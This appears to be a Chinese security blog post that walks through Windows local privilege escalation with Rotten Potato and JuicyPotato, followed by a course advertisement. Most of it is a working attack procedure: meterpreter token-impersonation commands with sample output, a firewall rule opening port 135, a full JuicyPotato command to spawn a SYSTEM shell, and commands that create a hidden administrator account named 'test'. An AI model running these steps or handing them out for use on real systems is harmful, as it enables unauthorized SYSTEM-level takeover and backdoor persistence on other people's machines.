点击上方蓝字关注我们
烂土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012
烂土豆下载地址:
https://github.com/foxglovesec/Potato
烂土豆提权原理:
通过烂土豆提权的重点是模拟令牌,在提权的过程中,我们最好已经获得了一个具有SeImpersonate权限或其他同等权限的账户,通常Windows中的许多服务具有此权限(IIS和SQL Server等)
烂土豆优点:
上传烂土豆到靶机上,通过msf获取meterpreter 查看是否具有Selmpersonate权限
meterpreter > getprivs##或者服务器的cmd下键入以下命令
whoami /all
whoami /priv
如下,SeImpersonatePrivilege是土豆提权的必要条件
再使用incognito执行烂土豆,欺骗得到system令牌
use incognito
list_tokens -u
execute -cH -f c:\\wmpub\\potato.exe
欺骗成功 最后一行模拟到system的令牌
meterpreter > execute -f potato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEMDelegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah
Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
模拟成功后,需要快速使用,否则令牌会消失
impersonate_token "NT AUTHORITY\\SYSTEM"
下载地址:
https://github.com/ohpe/juicy-potato
个人理解的原理(说的不对,但好理解一点):
在本地账户的权限下 1.以system权限加载COM请求,认证NTLM(当然我们是本地账户,无法越权使用system权限,会认证失败) 2.再以本地账户权限发起默认135端口请求,认证NTLM(这次权限对了认证成功了) 3.分别拦截两个NTLM的数据包,替换数据,使得通过步骤1的认证,获得system权限的token 4.利用system权限的token创建进程
实现流程如下(大佬的说明)
##查看本地用户的权限,是否具有SeImpersonate或SeAssignPrimaryToken权限
whoami /all
whoami priv
如果开启SeImpersonate权限,juicypotato的参数可以使用-t t
如果开启SeAssignPrimaryToken权限,juicypotato的参数可以使用-t u
如果均开启,可以选择-t * 如果均未开启,那么无法提权。
查看RPC默认端口是否为135
netstat -abno
##若rpc服务被修改,则使用-n 参数指定修改后的端口,如 -n 111##添加防火墙规则,允许135端口入站
netsh advfirewall firewall add rule name="135" protocol=TCP dir=in localport=135 action=allow
不同操作系统选择可用的CLSID 参考列表:
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
随便选择了一个 6d18ad12-bde3-4393-b311-099c346e6df9
选择系统未占用的端口作为监听端口 最终提权命令如下
C:\wmpub\JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {<!-
- -->6d18ad12-bde3-4393-b311-099c346e6df9}
执行成功即可获取一个system权限的shell,后续就是打开任务管理器,关闭explore任务,再开启explore任务即可得到一个system权限的桌面
##下载地址
https://github.com/uknowsec/JuicyPotato
提权命令
C:\juicyPotato_32.exe -p whoami##执行命令
execute -f juicypotato.exe -p net user test 123456
execute -f juicypotato.exe -p net localgroup administrators test /add
如果想要系统学习网络安全技术
不妨加入知识星球课程
《60天入门网络安全渗透测试》
从入门到案例,贴合实战
轻松易懂、好玩实用
限时领取
知识星球
活动优惠券
跟着60天入门学习路线一起学
期待你的到来!
往期推荐
从入门到入狱的技术,可以学,别乱用!
网络安全学习方向和资源整理(建议收藏)
一个web安全工程师的基础学习规划
资源 | 渗透测试工程师入门教程(限时领取)
5年老鸟推荐10个玩Python必备的网站
推荐十个成为网络安全渗透测试大佬的学习必备网站!
那些社工师不为人知的秘密。。。
更多内容请关注公众号
网络安全自修室
点个在看你最好看